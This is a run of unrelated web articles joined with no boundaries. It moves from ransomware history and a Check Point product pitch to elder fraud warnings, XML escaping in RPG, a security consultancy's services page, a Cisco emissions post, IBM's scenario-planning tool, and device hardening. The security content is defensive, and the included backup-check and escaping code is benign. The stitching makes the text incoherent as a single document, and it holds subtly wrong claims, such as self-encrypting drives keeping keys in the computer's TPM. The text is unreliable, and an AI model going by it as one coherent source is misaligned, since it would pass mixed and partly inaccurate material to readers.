When a cyber-criminal wants to make a quick bundle of cash, they use ransomware to infect a computer and encrypt all of the data on the hard drive. The malicious software sends an alert to the user indicating they must pay a ransom or lose their files forever. In the past, criminals demanded ransoms be sent via cash or money order to post office boxes. However, that didn't last, because post office boxes are traceable to an individual. Today, the ransom is almost always requested in the untraceable, anonymous currency of Bitcoin. Now that ransoms can be paid in an untraceable manner, the frequency of ransomware attacks has exploded.

The first documented ransomware attack was perpetrated in December 1989 by an evolutionary biologist named Joseph L. Popp. Back in 1989, the internet existed, but it wasn't what it is today, so the attack was executed through an infected computer disk. Popp sent out 20,000 infected disks to attendees of the international AIDS conference. The disks were labeled "AIDS Information – Introductory Diskettes." Under the guise of being a questionnaire to help users determine their risk of contracting AIDS, the disks were secretly infected with ransomware dubbed the "AIDS Trojan," also known as the "PC Cyborg." After 90 reboots, unsuspecting victims were met with a ransom demand for $189. Popp wanted payments sent to his post office box in Panama, which was eventually traced. Surprisingly, he was caught but never prosecuted.

Since then, thousands of ransomware attacks have been perpetrated against individuals, small businesses, and even giant corporations. Although ransomware attacks started out rather basic, they've become complex and virtually untraceable. Unfortunately, because of the profitability, ransomware attacks are here to stay. Although most people understand the concept of ransomware, it should be called out for what it really is – extortion. Extortion is a felony in the United States, and that's why modern-day criminals only dare to launch ransomware attacks while relying on the anonymity of cryptocurrencies.

Ransomware attacks rely on encryption technology to prevent access to files. Throughout the 1990s, as encryption methods continued to advance, ransomware attacks also became more sophisticated and effectively impossible to crack. Around 2006, groups of cyber criminals began taking advantage of asymmetric RSA encryption to make their attacks even harder to thwart. For example, the Archiveus Trojan used RSA encryption to encrypt the contents of a user's "My Documents" folder. The ransom demanded victims purchase goods through an online pharmacy in exchange for a 30-digit password that would unlock the files. Another ransomware attack around that time was the GPcode attack. GPcode was a Trojan distributed as an email attachment masquerading as a job application. This attack used a 660-bit RSA key for encryption. Several years later, Gpcode.AK – its successor – leveled up to using 1024-bit RSA encryption. This variant targeted more than 35 file extensions.

Ransomware attacks may have started off simplistic and daring, but today they've become a business' worst nightmare and a criminal's cash cow. Cyber criminals know they can make money with ransomware, and it's become a hugely profitable industry. According to a Google study titled Tracking Ransomware End-to-End, cyber criminals make over $1 million per month with ransomware. "It's become a very, very profitable market and is here to stay," said one researcher.
The study tracked more than $16 million that appeared to be ransom payments made by 19,750 people in the span of two years. The BBC reported on this Google study and explained that there are multiple 'strains' of ransomware, and some strains make more money than others. For example, a Bitcoin blockchain analysis showed that the two most popular strains – Locky and Cerber – made $14.7 million combined in just one year. According to the study, more than 95% of ransomware attackers cashed out their Bitcoin payments through Russia's now defunct BTC-e exchange. They'll probably never be caught.

Business owners who are unprepared for a ransomware attack won't bounce back without consequence – if they bounce back at all. They'll either pay the ransom (which doesn't always result in the restoration of files) or they'll spend time and money unsuccessfully trying to crack the encryption. When nothing works, they'll source a former version of their files from employees, contractors, and others who may have copies. While they might find most of their files, they won't be current versions, and the entire team will need to put in extra hours just to get the business back to normal.

The best way to withstand a ransomware attack is to be prepared before it happens. That requires creating regular offline backups on a device that doesn't stay connected to the internet. Malware, including ransomware, can infect backup drives and USB drives just the same. It's crucial to ensure you maintain current offline backups. (A simple integrity check for backups is sketched at the end of this article.)

If you haven't yet, now is the time to secure all endpoints with anti-ransomware software. At Check Point Software, we offer this solution to all of our endpoint security suite customers. Our endpoint security suite – Harmony Endpoint – delivers real-time threat prevention to all of your organization's endpoints. With so many devices accessing your company's network, you can't afford to skip endpoint protection and threat prevention. Today's borderless networks require powerful software to protect against cyber-attacks of all kinds, including ransomware. With Harmony Endpoint, your network will be dynamically protected around the clock from ransomware and other threats.

To learn more about how Check Point can protect your network, schedule a free demo of Harmony Endpoint or contact us for more information. If you're not sure which services you need, our data protection experts will help you find what's right for you.
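Since the advice above hinges on keeping offline backups current, a small integrity check helps. The sketch below is our illustration, not a Check Point tool: it hashes every file in a live folder and compares it against an offline copy, reporting anything missing or altered. The paths are hypothetical; run it while the backup drive is temporarily attached, then disconnect the drive again.

```python
import hashlib
from pathlib import Path

def sha256(path: Path) -> str:
    """Hash a file in 1 MB chunks so large files don't exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(live_dir: str, backup_dir: str) -> list[str]:
    """Return relative paths whose backup copy is missing or differs."""
    live, backup = Path(live_dir), Path(backup_dir)
    bad = []
    for src in live.rglob("*"):
        if src.is_file():
            rel = src.relative_to(live)
            copy = backup / rel
            if not copy.exists() or sha256(copy) != sha256(src):
                bad.append(str(rel))
    return bad

if __name__ == "__main__":
    print(verify("C:/CompanyData", "E:/offline-backup"))  # hypothetical paths
```

One caveat: during an active infection the live files will differ from the backup because they have been encrypted — the point of the check is routine verification beforehand, so you know the offline copy is complete and trustworthy when you need it.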
According to the FBI, each year millions of elderly Americans fall victim to some type of financial fraud. Savvy criminals may use deception and misinformation to trick older victims, including impersonating a trusted individual or organization, using a fake number on caller ID, pressuring the victim to make a quick decision, or even threatening them. Learn about these common scams that target seniors as well as ways to help you or your loved ones better detect and avoid them.

What Is Elderly Financial Fraud?

Older adult financial fraud occurs when someone misuses or steals financial assets, income, or personal identifying information from an older adult, often without their knowledge or consent. Seniors may be targeted by criminals because of their financial savings and solid credit, or simply because of the tendency of many older people to be trusting and polite. Scammers may contact their victims directly via computer, phone, or mail, or indirectly through TV and radio offers. According to the Internet Crime Complaint Center (IC3), perpetrators use a variety of methods to deceive and defraud senior victims, including:

- Impersonation scams - Scammers may pose as government employees or other officials claiming that the victim owes money for a fee or penalty. IRS impersonators may contact victims by phone and use aggressive tactics such as threatening the victim with arrest, suspension of a driver's license, or deportation. Social Security Administration imposters may tell victims that their Social Security number has been suspended because of suspicious activity or a crime and ask them to confirm the number in order to steal the information.
- Robocall scams - Con artists may use robocalls to distribute prerecorded phone messages that appear to come from a bank, credit card company, creditor, or government agency. The goal is often to trick victims into revealing their account numbers, Social Security numbers, passwords, or other identifying information. These scammers may spoof caller ID to impersonate a legitimate organization or to appear as if they are calling from the victim's home state or local area code.
- Romance scams - Some criminals pose as a romantic interest on dating websites or social media in order to take advantage of an elderly victim's desire to find companionship. Scammers have been known to create elaborate profile pages, communicate with the victim over the course of weeks or even months to build trust, or express a desire to marry the victim. These criminals often ask the victim for money to pay for travel expenses, a so-called medical emergency, visas or other official documents, or losses from a temporary financial setback.
- Grandparent scams - During a grandparent scam, perpetrators may contact the victim pretending to be a relative—often a child or grandchild—in urgent financial need. Scammers may tell the victim that their grandchild needs money to help with an emergency, such as getting out of jail, paying a hospital bill, or leaving a foreign country.
- Tech support scams - Scammers may contact the victim and impersonate a tech support representative, often using scare tactics to trick an older adult into paying for unnecessary services to fix a bogus problem. Fraudsters may claim to be a technician from a well-known company, or they may use pop-up messages to warn about fake computer problems.
- Home improvement scams - Home improvement scammers may approach victims door-to-door, claiming they were in the neighborhood and noticed that the house needs repairs.
They often ask for payment up front, and later disappear with the money, do low quality work, or claim to have discovered other problems in the house that need immediate attention at a significant cost. - Sweepstakes, charity or lottery scams - Criminals may claim to work for a charitable organization or say their victim has won a foreign lottery or sweepstakes, which can be collected after paying a fee. Warning Signs of Elderly Financial Fraud According to the FBI, seniors may be less inclined to report fraud because they don’t know how to report it, they are ashamed of being a scam victim, or they fear their relatives will lose confidence in their abilities. According to the US Department of Justice, warning signs of financial exploitation of an elderly person may include: - Changes in bank accounts or banking practices, including unexplained withdrawals - Unexpected changes in a will or other financial document - Unexplained disappearance of funds or other possessions - Unpaid bills or substandard care, despite the availability of adequate financial resources - Potentially forged signatures on financial transactions or titles - Sudden appearance of a previously uninvolved family member claiming property or possessions - Unexplained sudden transfer of assets to another person - The purchase of unnecessary services The impact of elderly financial fraud to its victims can be severe, including the loss of financial security, feelings of fear, shame, or self-doubt, reliance on government assistance programs, or even depression or hopelessness. Steps for Older Adults to Help Better Protect Themselves from Financial Fraud - Be cautious in sharing personal or financial information - The FBI advises individuals to never provide personal or financial information over the phone to an unverified person or organization. Instead, it is advised to hang up and call the phone number listed on the company’s account statement or the company or government agency’s official website. The IC3 advises never to give or send any personally identifiable information, money, jewelry, gift cards, checks, bank wire information, or funds to unknown or unverified persons or businesses. - Beware of unsolicited calls, messages, mail, or home visits - Experts advise that individuals screen unknown callers using voicemail. It is also recommended not to open any unrecognized emails, attachments, or websites, and to be cautious of any unsolicited mail and door-to-door service offers. - Consult a trusted family member or friend - The US Senate Special Committee on Aging recommends that seniors consider checking with a family member or trusted friend before giving out money or personal or financial information. If a panicked relative calls to request money, the Federal Trade Commission (FTC) advises calling the individual directly via a phone number that is known to be genuine or verifying the story with another family member or friend, even if the caller wants to keep it a secret. - Seek out verified professional services - To contract technical support services, it’s advised to find official contact details, such as information listed on the device’s original packaging or receipt. Many software companies offer tech support online or by phone, and computer stores often provide in-person support. 
When services are needed for home repairs or improvements, the Better Business Bureau recommends asking the contractor for references, searching for the company on the bbb.org website, and getting a written contract with the price, materials, and timeline. It’s best to avoid cash-only deals or expensive upfront payments. - Avoid romance scams - According to the US Department of Justice, an online love interest who asks for money is most likely a scam artist. The FTC advises that individuals never send money or gifts to someone they haven’t met in person. It’s also a good idea to see if the photo is being used by more than one person by using the internet browser’s “search by image” feature. Experts recommend that individuals talk to a trusted relative or friend about any new online romantic interest. - Search online for the individual, offer, or business - Experts advise that individuals search online using the contact information (name, email, phone number, or address) and the proposed offer. Other people often post information online about individuals or businesses that attempt to run scams. - Beware of pop-up messages - Cybercriminals often use pop-up messages to spread malicious software. If an individual receives a pop-up message or locked screen, it’s recommended to immediately disconnect from the internet and shut down the device. - Keep devices up-to-date - It’s recommended to keep all devices updated, including anti-virus software, firewalls, and pop-up blockers. If you believe you or someone you know may have been a victim of elder financial fraud, the FBI advises contacting the local FBI field office and filing a complaint with the Internet Crime Complaint Center at www.ic3.gov. Suspected cases of identity theft can be reported to the FTC at Identitytheft.gov.
Encoding XML (Or HTML) From Within RPG

April 17, 2013 Bob Cozzi

RPG developers who jump to the web and CGI programming soon learn that a stream-based syntax requires the use of certain control characters. Unlike native database, which uses structures and hidden attributes to control field size and starting and ending locations, HTML and XML rely on tags, agreed-upon syntax for start and end delimiters. You may be familiar with Comma Separated Values and the use of both the comma and the double-quote as the delimiters for that type of file. XML and HTML use much more verbose values as their tags or delimiters. Tags do double duty; they separate data and they group related data together. For example, the individual fields of data in an XML document are separated by tags, while a set of data (similar to a record in a database table) is grouped together with an outer set of tags. Something like this:

<address> <street>123 Main St.</street> <city>Anytown</city> <state>Illinois</state> <postcode>60639</postcode> </address>

The tags are given user-specified names. In this example, the tags named street, city, state, and postcode separate the individual pieces of data, while the address tag groups the inner collection together. HTML works the same way. A basic HTML document might look something like this:

<html> <head> <title>IT Jungle</title> </head> <body> <h1>Bob Cozzi's Website</h1> <p>Hello World! </p> </body> </html>

Looks very similar to our XML address example, doesn't it? The tags separate the components of an HTML page into the header and detail pieces. But what happens if I have data in my XML or HTML that includes the left or right bracket (greater than or less than symbols)? Those characters and a few others will cause a problem. Let's look at the XML example first. If the address street is "123 <G> Main St." then the XML parser will think that the <G> is some kind of XML tag and look for the closing </G> tag. If it can't find it, the parser will fail. To accommodate the parser, XML and HTML have instituted escape codes. Escape codes come in two forms: escape sequence and symbolic escape code. The normal escape sequence begins with the two characters &# followed by the numeric ASCII code for the character, followed by a semicolon. For example, the escape sequence of the left bracket (a.k.a., the less than symbol) is:

&#60;

The numeric 60 is the ASCII code for the < symbol. Likewise, the right bracket (the greater than symbol) is ASCII 62, so its escape sequence is:

&#62;

If your XML data contains a < symbol, it must be translated into &#60; in the data portion of the XML document. In other words, this. . .

<street>123 <G> Main St. </street>

. . .needs to be translated to this. . .

<street>123 &#60;G&#62; Main St. </street>

Yes, it is that ugly and yes, it is required. As a consequence of this escape sequence, the ampersand character also needs to be escaped; otherwise the XML parser thinks you are starting an escape sequence of something else, and therefore it is invalid and fails. To escape an ampersand, you could use the following:

&#38;

But since the ampersand is so common, a symbolic escape code is available:

&amp;

The letters &amp; tell the XML parser that you have replaced a real ampersand; it has the same impact as coding &#38; however &amp; is easier to remember and is CCSID agnostic. For most characters, XML supports the &#nn; escape sequence. That is, you can insert &#65; instead of the letter A if you really want to, but it is not necessary. There are, however, five characters that should always be escaped in your XML data.
These five characters have special meaning to XML (such as the left and right brackets, also known as greater than and less than symbols). You could in theory escape every single letter/character in your XML data (the content between the tags), but why? XML only requires the following five escape codes. I also strongly recommend escaping a sixth character whenever you send XML over HTTP. Here are those six symbols along with their escape sequences:

< (less than) = &lt; or &#60;
> (greater than) = &gt; or &#62;
& (ampersand) = &amp; or &#38;
" (double quote) = &quot; or &#34;
' (apostrophe) = &apos; or &#39;
% (percent sign) = &#37;

The percent sign is included in this list because it can create a problem if you transfer XML over HTTP. So be sure to escape it as well. It never hurts to escape, and with only six characters that need it in XML, it is not rocket science.

Escape To RPG

When building the XML document in RPG, analyze the data before enclosing it in XML tags, and escape it. Fortunately, in RPG IV at v7.1 it is incredibly simple to escape the data. In the example here, I use the v7.1 %SCANRPL built-in function. If you are not yet on IBM i v7.1 you can use the homegrown version named SCANRPL that I showed you in a previous article. Note that the ampersand must be escaped first: if it were escaped after the others, the ampersands inserted by the earlier replacements would themselves be escaped a second time, corrupting the data.

myData = %SCANRPL('&' : '&amp;' : myData);
myData = %SCANRPL('"' : '&quot;' : myData);
myData = %SCANRPL('''' : '&apos;' : myData);
myData = %SCANRPL('<' : '&lt;' : myData);
myData = %SCANRPL('>' : '&gt;' : myData);
myData = %SCANRPL('%' : '&#37;' : myData);

After processing the above substitution values, the data stored in the MYDATA field is considered to be "escaped." Note that when escaping the apostrophe (which we often refer to as a quote) it must be doubled up. That is, a single quote must be doubled and then enclosed in quotes; therefore four consecutive quotes or apostrophes are specified (line 3 above) to replace the single character. If you escape your data before embedding it into XML, the receiving end will have a much easier time parsing the data and producing accurate results.
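For readers who want to cross-check the substitutions outside of RPG, here is the same routine sketched in Python — not part of Cozzi's original article, just an equivalent of the six replacements above, in the same ampersand-first order.

```python
def escape_xml(data: str) -> str:
    # Ampersand must be handled first, or the '&' inside the other
    # entities would itself get re-escaped.
    replacements = (
        ("&", "&amp;"),
        ('"', "&quot;"),
        ("'", "&apos;"),
        ("<", "&lt;"),
        (">", "&gt;"),
        ("%", "&#37;"),  # recommended when sending XML over HTTP
    )
    for raw, entity in replacements:
        data = data.replace(raw, entity)
    return data

print(escape_xml('123 <G> Main St.'))  # 123 &lt;G&gt; Main St.
```

Reversing the first replacement's position — say, escaping & last — would turn an already-escaped &lt; into &amp;lt;, which is exactly the corruption the ordering note above warns about.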
Cyber security is the protection of computers, information technology systems, servers, data, and networks from digital attacks. Cyber security programs may include preventative measures like implementing computer network security to avoid malware attacks, executing application security before deployment, prioritizing end-user education to avoid erroneous security practices, and developing a disaster recovery and business continuity policy to counter the loss of operations and data. Cyber security also focuses on protecting sensitive data: establishing information security supports data privacy and integrity, and adopting operational security measures strengthens data protection.

Cyber security is crucial because government, military, corporate, financial, and medical organizations collect, process, and store unprecedented amounts of data on computers and other devices. A significant portion of that data can be sensitive information, whether as intellectual property, financial data, personal information, or other types of data for which unauthorized access or exposure could have negative consequences. Organizations transmit sensitive data across networks and to other devices while doing business, and cyber security describes the discipline dedicated to protecting that information and the systems used to process or store it. As the volume and sophistication of cyber-attacks grow, companies and organizations, especially those tasked with safeguarding information relating to national security, health, or financial records, need to take steps to protect their sensitive business and personnel information.

Arbour Group's Cyber Security Services

At Arbour Group, whether it is Security Risk Consulting, Security Assessments, Audits, Security Programs Design and Implementation, Vulnerability Management, Penetration Testing, or Incident Response, we can help you achieve your cyber security goals. We can perform Cyber Risk Assessments that consider any regulations that impact the way your company collects, stores, and secures data, including but not limited to:

- Payment Card Industry Data Security Standard (PCI-DSS)
- Health Insurance Portability and Accountability Act (HIPAA)
- Sarbanes–Oxley Act (SOX)
- Federal Information Security Modernization Act (FISMA)

Arbour Group's Cyber Security services also adhere to additional standards, such as those from the National Institute of Standards and Technology (NIST), and additional frameworks that help you ensure sufficient cyber security certification. An organization needs to coordinate efforts throughout its entire information system. Some elements of cyber security include but are not limited to the following:

- Network security: The process of protecting the network from unwanted users, attacks, and intrusions. Ensure that internal networks with sensitive operations and data are protected from changes and exploitation.
- Application security: Apps require constant updates and testing to ensure these programs are secure from attacks. Implemented methodologies ensure unauthorized access is prohibited.
- Endpoint security: Remote access is a necessary part of business but can also be a weak point for data. Endpoint security is the process of protecting remote access to a company's network.
- Data security: Inside of networks and applications is data. Protecting company and customer information is a separate layer of security and privacy.
- Identity management: Essentially, this is the process of understanding the access every individual has in an organization. It ensures the appropriate people have the proper access to predetermined technologies.
- Database and infrastructure security: Everything in a network involves databases and physical equipment. Protecting these devices is equally important, as they are also vulnerable to malicious cyber attacks, including when used with cloud environments.
- Cloud security: As companies transition away from on-premise environments, many files live in digital environments, or "the cloud." Protecting data in a 100% online environment presents its own unique challenges.
- Mobile security: Cell phones and tablets involve virtually every type of security challenge in and of themselves, with sensitive information open to cyber vulnerabilities.
- Disaster recovery/business continuity planning: In the event of a breach, natural disaster, or other event, data must be protected, and business must continue. For this, a plan must be predetermined to maintain business continuity even without certain resources.
- End-user education: Users may be employees accessing the network or customers logging on to a company app. Teaching good habits (password changes, two-factor authentication) is an integral part of cybersecurity.
- Internet of Things security: Technology that safeguards connected devices and networks in the Internet of Things (IoT). Software, hardware, and connectivity must be secure for the effective use and protection of digital data.

For more information on Arbour Group's Cyber Security services, contact us today!

Arbour Group has provided us with competent validation project leadership that has enabled us to complete projects in a timely and cost effective manner. The use of Arbour's validation product greatly facilitated the process.

The regulatory assistance provided by Arbour Group has enabled us to enhance our compliance profile with life sciences customers. Their Managed Services for software development and quality assurance play a key role in controlling business risk and reducing costs.

Arbour Group provided effective validation services to us and were a valuable part of the overall success of our company-wide ERP implementation. Their integration into our multi-phase ERP roll out was seamless and assured us of comprehensive regulatory compliance.
We have both a responsibility and an opportunity to reduce greenhouse gas (GHG) emissions. In just the last 50 years, scientists and experts report, global GHG emissions have grown by nearly 70%, and GHG concentrations in the Earth's atmosphere have increased nearly 30% in that same span. The data shows that our climate will continue to warm in the next 100 years, with significant impacts on people, wildlife, agriculture, the economy, and our planet. While Cisco has made significant progress in reducing our emissions — a 41% reduction in Scope 1 and 2 GHG emissions over the last 10 years, for example — there's plenty of work to be done to solve this global problem.

At Cisco, corporate social responsibility is at the core of our business, our culture, and how we invest our resources. It's why GHG emissions reduction is one of our most material environmental issues and a core component of our overall CSR strategy to accelerate global problem solving, through our technology and expertise, to positively impact people, society, and the planet.

With Earth Day fast approaching, I recently spoke with a few Cisco experts representing the key areas of our GHG emissions reduction strategy. We highlighted how Cisco is specifically reducing global emissions by improving the energy efficiency of products and our operations while also encouraging our suppliers to improve their own operational energy efficiency. As part of the podcast, we discussed Cisco's ambitious long-term GHG reduction goals and how they plan to achieve them in their respective areas of the business. My guests included:

- Andy Smith, Global Sustainability Manager in our Workplace Resources organization
- Joel Goergen, Cisco Distinguished Engineer
- Abbey Burns, Sustainability Manager in our Supply Chain organization

After listening, you'll see that the earth's natural cycles are being disrupted and that these disruptions impact all facets of our lives. As individuals, businesses, industries, and communities, we have a responsibility and an opportunity to help address this global problem. Subscribe to the Cisco CSR Podcast and stay tuned for new episodes on our efforts to accelerate global problem solving for people, society, and the planet.
My team at IBM Research has created a unique tool, called IBM Research Scenario Planning Advisor, that can use AI planning to support risk management activities in areas like security and finance. IBM Research Scenario Planning Advisor is a decision support system that allows domain experts to generate diverse alternative scenarios of the future and imagine the different possible outcomes, including unlikely but potentially impactful futures. Planning and plan recognition Preparing for the future is fundamental to the success of most human endeavors, from playing chess to running a multinational organization. At IBM Research AI, we build AI-based systems that use expert knowledge and AI planning to reason about observations derived from relevant news and social media and generate explanations and hypotheses about the current state of the world—and many possible alternative future states. Planning is a long-standing area of research within AI. Planning is the task of finding a procedural course of action for a declaratively described system to reach its goals while optimizing overall performance measures. AI planning can help when (1) your problem can be described in a declarative way; (2) you have domain knowledge that should not be ignored; (3) there is a structure to a problem that makes it difficult for pure learning techniques; or (4) you want to be able to explain a particular course of action the system took. A plan recognition problem is the inverse of a planning problem: instead of a goal state, you are given a set of possible goals. The task in plan recognition is to find out which goal was being achieved and how. Scenario planning is a widely accepted technique by which organizations develop their long-term plans. Scenario planning for risk management puts an added emphasis on identifying the extreme yet possible risks and opportunities that are not usually considered in daily operations. Scenario planning involves analyzing the relationship between forces (such as social, technical, economic, environmental, and political trends) in order to explain the current situation, in addition to providing insights about the future. This process is depicted in the picture below. A major benefit to scenario planning is that it helps us to learn about and anticipate possible alternative futures. We use scenario planning because we cannot predict the future. We use AI planning, informed by expert domain knowledge, because some scenarios have never yet occurred and thus cannot be projected by probabilistic means. And we generate many different scenarios, exploring a variety of possible futures, because we want to be prepared for both expected and surprising futures. IBM Research Scenario Planning Advisor Our approach transforms risk management into a plan recognition problem and applies AI planning to generate solutions. It addresses several challenges inherent to this task. They include: (1) having inconsistent, missing, unreliable observations; (2) being able to generate not just one but many future plans; and (3) being able to capture and encode the necessary domain knowledge. IBM Research Scenario Planning Advisor includes tooling for experts to intuitively encode their domain knowledge and uses AI planning to reason about this knowledge and the current state of the world, including news and social media, when generating scenarios. 
In our recent paper at the 2018 Association for the Advancement of Artificial Intelligence (AAAI) conference, we first characterize the scenario planning problem as a plan recognition problem and then use AI planning to generate many possible plans. Finding one plan is computationally challenging (it is PSPACE-complete), but our system finds a set of plans. We transform the domain knowledge into a planning task, the risk drivers into observations, and the business implications into the set of possible goals. We then use planning to compute a set of plans. We cluster these plans and present a handful of scenarios to the users.

Our system can be applied in network security, healthcare, and finance – industries that have at least two factors in common: (1) they have teams of analysts and domain experts who can provide the necessary domain knowledge to the system, and (2) they generate many news events that can serve as observations of their current states and data points for where they are headed in the future. Our system is able to explain the past and project the future by providing a range of possible scenarios and an explanation for each scenario.

Planning for risk management

We have so far focused on applying our approach to scenario planning for risk management. IBM Research Scenario Planning Advisor is currently in deployment within IBM, supporting financial teams in their risk management activities. The system's cognitive tools assist analysts in two ways. First, it provides situational awareness of relevant risk drivers by detecting emerging storylines. Second, it automatically generates future scenarios that allow analysts to reason about, and plan for, contingencies and opportunities in the future.

Each scenario the system produces highlights: (1) the potential leading indicators, the set of facts that are likely to lead to a scenario; (2) the scenario and emerging risk, the combined set of consequences in that scenario; and (3) the business implications, a subset of potential effects of that scenario that the decision-makers care about.
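To make the plan-recognition framing concrete, here is a deliberately tiny sketch — our illustration, not the Scenario Planning Advisor's actual engine or domain model. Candidate goals (business implications) are ranked by how much of the observation stream their known plans explain; the domain, the event names, and the scoring rule are all invented for the example. A real planner searches for plans from a declarative model rather than matching hand-written sequences.

```python
# goal -> plausible plans, each plan an ordered sequence of observable events
DOMAIN = {
    "supply_shock":  [["port_strike", "freight_cost_up", "inventory_drop"]],
    "credit_crunch": [["rate_hike", "defaults_up", "lending_tightens"]],
}

def score(plan, observations):
    """Fraction of observed events the plan explains, respecting order."""
    i, hits = 0, 0
    for event in observations:
        if i < len(plan) and plan[i] == event:
            hits, i = hits + 1, i + 1
    return hits / max(len(observations), 1)

def recognize(observations):
    """Rank candidate goals by how well their plans explain the observations."""
    ranked = []
    for goal, plans in DOMAIN.items():
        best = max(score(plan, observations) for plan in plans)
        ranked.append((best, goal))
    return sorted(ranked, reverse=True)

print(recognize(["rate_hike", "defaults_up"]))
# [(1.0, 'credit_crunch'), (0.0, 'supply_shock')]
```

The inversion the article describes is visible even at this scale: given only partial, noisy observations, the system asks "which goal's plans best explain what we saw?" — and the remaining unexecuted steps of the best-matching plans become the projected scenario.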
What Does It Mean to Harden a Device?

Hardening a device means making it more resilient against threat actors. In the cybersecurity world, that means making that device more secure and resilient to attacks. By hardening a device, you are making it more difficult for hackers to break into. In essence, you are building the biggest, hardest "wall" you can around devices and services. Let's explain why this is the perfect term for device security.

There is a saying in infosec: the only secure computer is one that is turned off. That's because there is no such thing as perfect security. If a threat actor is willing enough, they will break into a computer system. The idea of information security is to make your assets harder to break into than the other guy's. That's what it means to harden a device. You are making your computers more difficult to break into than someone else's. You are making the return on investment for breaking into your systems very low, and thus the risk-to-reward ratio too poor for most bad guys to consider.

So, you need to harden your devices but aren't sure where to start. Thankfully, there are a lot of good resources available online. Before attempting to harden all your hardware and software components, take a moment to develop a security baseline first. Only after ensuring that you have a minimum level of security across your organization should you start attempting to hunt down and fix random exploits. Otherwise, you may end up just putting on a good show of IT theater.

An Overview of Hardening Devices [VIDEO]

In this video, CBT Nuggets trainer Keith Barker covers what it means to harden a device, which is an important step in creating a security baseline.

What is a Cybersecurity Baseline?

A security baseline in cybersecurity is a minimum recommended configuration for software, services, or hardware devices. Keep in mind, these recommendations are the bare minimum for meeting security requirements. Depending on your industry, you may need to meet more stringent standards. For instance, if you are in the healthcare industry, you will need to comply with both HIPAA and HITECH laws. Many people are already familiar with HIPAA, but not as many are familiar with HITECH. Both HIPAA and HITECH breaches can cost businesses tens of thousands of dollars per month per incident. Each violation typically includes multiple incidents, too. So, when reviewing or creating your security baseline, make sure to know whether you need to comply with any laws or regulations in the places you do business. Otherwise, you could easily accrue hundreds of thousands of dollars in fines.

Security baselines are a good checklist for IT professionals. With how complex information systems are today, even for small businesses, it is easy to miss changing a setting or disabling a specific service. Even worse, these security baseline checklists need to be constantly audited and tested as new security vulnerabilities are found.

Creating and auditing security baselines isn't an easy task. It's common for businesses to have a mix of devices like laptops, desktops, smartphones, and servers. Likewise, many businesses are deploying a hybrid cloud environment. That means a security baseline needs to be created for both local software and web-based services. Many vendors offer free documentation for securing IT environments.
For example, Microsoft offers white papers explaining how to secure Server, how to control access to resources like Office 365, and what policies to use for Windows in an Active Directory environment. Don't let these resources go underutilized.

Where to Find Cybersecurity Recommendations

Though creating a security baseline for your organization might not be easy, it is not impossible. It will require research and work. Thankfully, there are a lot of vendors and government agencies that do the heavy lifting for you. All you need to do is read their documentation and follow their guidance.

I hear the skeptics among you criticizing that last statement. Why would you ever put your faith in vendors or government agencies? A healthy amount of skepticism is always a good thing, but white paper documentation from the industry's giant IT software and hardware vendors has been trusted for decades. Likewise, though agencies like the CIA may not reveal all their secrets, they have special branches dedicated to helping organizations safeguard their IT infrastructure. In fact, the CIA and NSA regularly report exploits they find.

Though many vendors have security procedures and recommendations available for their products, and there are tons of government agencies, we would be remiss not to mention the three big players here: Microsoft, Cisco, and NIST.

Where to Find Security Recommendations From Microsoft

Microsoft is one of the largest corporate software vendors. Their Server OS, Windows operating system, and productivity suites are some of the most installed pieces of software in the world. Likewise, Microsoft's applications are some of the most configurable software on the planet, too. Microsoft's reputation depends on its ability to deliver a usable and secure product. So, Microsoft creates documentation for all its applications, from Server to Windows and Office, on how to configure, manage, and secure them. Microsoft has a lot of documents outlining recommended security baselines for its products, but a good place to start is here.

Where to Find Cisco Security Recommendations

Cisco is one of the most recognizable names when it comes to IT network equipment. So, it would only make sense that Cisco would have tons of documents explaining how to secure their hardware and software. Thankfully, a lot of Cisco's security suggestions can be used with hardware from other vendors as well. You may need to reference documentation from those other vendors to find specific settings or to cross-reference vendor-specific terminology, but it is possible. If you would like to reference Cisco's documentation, look at document number 13608.

Where to Find NIST Security Recommendations

One of the best places to stay up to date regarding new security vulnerabilities is NIST. NIST has a database of known security vulnerabilities for a lot of software and hardware. Anyone in the IT trade needs to visit NIST's website regularly. That database is free, too. NIST doesn't hide information behind paywalls. Though NIST catalogs security issues, it doesn't go into the nitty-gritty of how each vulnerability works. It would still be worthwhile to thoroughly investigate any vulnerabilities that may affect your business. NIST is a perfect starting point for those investigations, though.

One of the best features offered by NIST is its newsletter. NIST will often send subscribers notifications of potential new vulnerabilities before those vulnerabilities hit the news cycle.
By the time a new vulnerability is being reported by more mainstream tech media outlets, it can be assumed that bad actors are already exploiting it. It is best to subscribe to NIST's newsletter and stay ahead of the cybersecurity curve.

The Risk of Mobile Devices

Imagine, for a moment, that it is your job to safeguard all the secrets of an organization. Those secrets are stored in a super-secure storage facility, but that information is also stored in pieces on hundreds of different mobile devices like laptops and smartphones. How do you secure those mobile devices?

The problem with mobile devices is that they cannot be continuously monitored. It's too easy to pick up a smartphone or laptop and walk away with it. Once that device is in the hands of threat actors, it's only a matter of time before they can steal the information from it. Often that information is worth far more than the device itself.

You can harden mobile devices. For instance, you can disable unused accounts on Windows laptops and prevent someone from being able to log into them. You can set proper permissions for folders on that laptop's storage drive. You can even create policies that allow you to remotely remove information from that laptop. However, none of that matters if a bad actor can physically remove storage from a device. So, what do you do? One of the ways you can harden mobile devices is by encrypting them.

What is Drive Encryption?

Drive encryption involves turning data into unreadable chunks by passing it through various algorithms. Depending on the algorithm used, those unreadable chunks cannot be read without a key to reverse the transformation applied to that data.

What are Self-Encrypting Drives?

Self-encrypting drives are storage drives (hard drives) that do not require software or user input to encrypt data stored on the drive. Encryption is automatic. Self-encrypting drives use the computer's TPM to store the private keys used for encrypting and decrypting the storage drive. The most common standard for self-encrypting drives is OPAL.

What is Whole Disk Encryption?

Whole disk encryption is the process of encrypting all storage blocks on a drive, not just single files. This is different from file-level encryption. Whole disk encryption typically requires a user to input a password when the computer starts in order to decrypt the drive. That's because the boot files are encrypted, too. A computer won't have any idea of what to do until the drive is decrypted. On the other hand, file-level encryption only encrypts specific folders or files on a drive.

Whole disk encryption does impose a performance cost on a computer system. Likewise, once a drive is decrypted, its data is fair game for hackers. So, make sure to weigh the pros and cons of whole-drive encryption before implementing it. It's not a magic security bullet.

The most popular way to perform whole drive encryption today is BitLocker. BitLocker is a Microsoft product. It is included with Windows Pro and Enterprise by default. Another common application for whole drive encryption is TrueCrypt. Though TrueCrypt was discontinued years ago, it has many forks that are still being maintained today.

